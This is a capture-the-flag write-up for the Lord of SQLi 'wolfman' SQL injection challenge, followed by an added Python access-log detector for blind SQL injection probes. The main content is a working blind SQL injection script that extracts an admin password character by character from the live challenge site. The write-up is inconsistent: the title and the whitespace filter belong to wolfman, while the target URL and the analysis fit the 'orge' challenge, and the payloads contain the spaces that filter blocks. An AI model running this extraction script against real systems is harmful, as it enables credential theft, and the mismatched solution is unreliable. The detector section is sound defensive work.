
[LOS] wolfman

Query

select id from prob_wolfman where id='guest' and pw='{$_GET[pw]}'


Protection

preg_match

  • the string prob
  • _
  • .
  • ()
  • ` ` (white space)


addslashes()

$_GET[pw] = addslashes($_GET[pw]);


Analysis

  • Blind SQL injection is possible, as in the orc challenge.
  • Use the || operator instead of or and && instead of and; because & is interpreted as a query-string separator, it is URL-encoded as %26.


Exploit code

import requests

url = 'https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php'
cookie = '39je4ges6g212tfsms39bnhqk5'

# Get the length of the password.
# %26%26 is the URL-encoded && and %23 is the URL-encoded # (comment), as described in Analysis.
length = 1
while True:
    payload = f"?pw=' || id='admin' %26%26 length(pw)={length} %23 "

    res = requests.get(url=f'{url}{payload}', cookies={'PHPSESSID': cookie})

    # The page greets admin only when the injected condition is true.
    if '<h2>Hello admin</h2>' in res.text:
        break

    length += 1

print(f'*** Found length: {length} ***')

# Get the password by binary search, one character at a time.
password = ''
for i in range(1, length + 1):

    low = ord('0')
    high = ord('z')
    while low <= high:
        mid = (low + high) // 2
        payload = f"?pw=' || id='admin' %26%26 ascii(substring(pw,{i},1))<={mid} %23 "
        res = requests.get(url=f'{url}{payload}', cookies={'PHPSESSID': cookie})

        if '<h2>Hello admin</h2>' in res.text:
            high = mid - 1
        else:
            low = mid + 1
    # When the loop ends, low is the smallest code point for which the condition held.
    password += chr(low)
    print(f'Current password: {password}')

print(f'*** Found Password: {password} ***')
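From the defender's side, the probes above leave a recognisable trail in the web server's access log: many requests from one client to the same script, each carrying a quote followed by || or &&, a length() or ascii(substring()) comparison, and an encoded comment. The following is an added example, not code from the original post, that scans combined-format log lines for exactly that pattern. The log lines in SAMPLE_LOG are constructed for the example (the IPs, path and timestamps are made up); the indicator names and the threshold are this example's own choices.

```python
"""Flag boolean-based blind SQL injection enumeration in web access logs."""
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Combined-log prefix: client, ident, user, [time], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators checked against the URL-decoded query string. Each corresponds to
# one piece of a blind probe: a quote plus boolean operator that redirects the
# WHERE clause onto another row, a length() or ascii(substring()) comparison,
# and a comment that discards the rest of the original statement.
INDICATORS = {
    "quote_tautology": re.compile(r"'\s*(\|\||&&|\bor\b|\band\b)\s*\w+\s*=", re.I),
    "length_probe": re.compile(r"\blength\s*\(\s*\w+\s*\)\s*(=|<=?|>=?)\s*\d+", re.I),
    "char_probe": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    "comment_terminator": re.compile(r"(#|--\s|/\*)"),
}

# Constructed sample log (not real traffic): one ordinary request, four probes
# from a single client, one lone request containing a '#', and one junk line.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:12:00:00 +0000] "GET /chall/target.php?pw=hunter2 HTTP/1.1" 200 410',
    '198.51.100.7 - - [01/Jan/2024:12:00:01 +0000] "GET /chall/target.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)=1%20%23%20 HTTP/1.1" 200 398',
    '198.51.100.7 - - [01/Jan/2024:12:00:02 +0000] "GET /chall/target.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)=2%20%23%20 HTTP/1.1" 200 398',
    '198.51.100.7 - - [01/Jan/2024:12:00:03 +0000] "GET /chall/target.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20length(pw)=3%20%23%20 HTTP/1.1" 200 398',
    '198.51.100.7 - - [01/Jan/2024:12:00:04 +0000] "GET /chall/target.php?pw=%27%20%7C%7C%20id=%27admin%27%20%26%26%20ascii(substring(pw,1,1))<=80%20%23%20 HTTP/1.1" 200 398',
    '203.0.113.9 - - [01/Jan/2024:12:00:05 +0000] "GET /chall/target.php?pw=foo%23bar HTTP/1.1" 200 410',
    'this line is not in combined log format',
]


def classify_request(target):
    """Return the indicator names matched by one request target (path?query)."""
    query = unquote(urlsplit(target).query)  # decode %26%26 -> &&, %23 -> #, etc.
    return [name for name, pat in INDICATORS.items() if pat.search(query)]


def analyze(lines, threshold=3):
    """Group suspicious requests per client and return alerts keyed by client IP.

    A client is reported when it sends at least `threshold` requests carrying an
    indicator, or a single request carrying two or more indicators (one probe
    already combines a tautology, a comparison and a comment).
    """
    per_client = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = classify_request(m["target"])
        if hits:
            per_client[m["client"]].append(hits)

    alerts = {}
    for client, hit_lists in per_client.items():
        strongest = max(len(hits) for hits in hit_lists)
        if len(hit_lists) >= threshold or strongest >= 2:
            alerts[client] = {
                "requests": len(hit_lists),
                "indicators": sorted({name for hits in hit_lists for name in hits}),
            }
    return alerts


if __name__ == "__main__":
    for client, info in analyze(SAMPLE_LOG).items():
        print(f"{client}: {info['requests']} probe(s), indicators={info['indicators']}")
```

The single-request rule matters more than the count: one decoded probe already carries three independent indicators, so the alert fires on the first request rather than after the enumeration has finished. The lone 203.0.113.9 request with a bare '#' is below the threshold and is not reported, which keeps ordinary values containing one odd character out of the alert list.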

This post is licensed under CC BY 4.0 by the author.
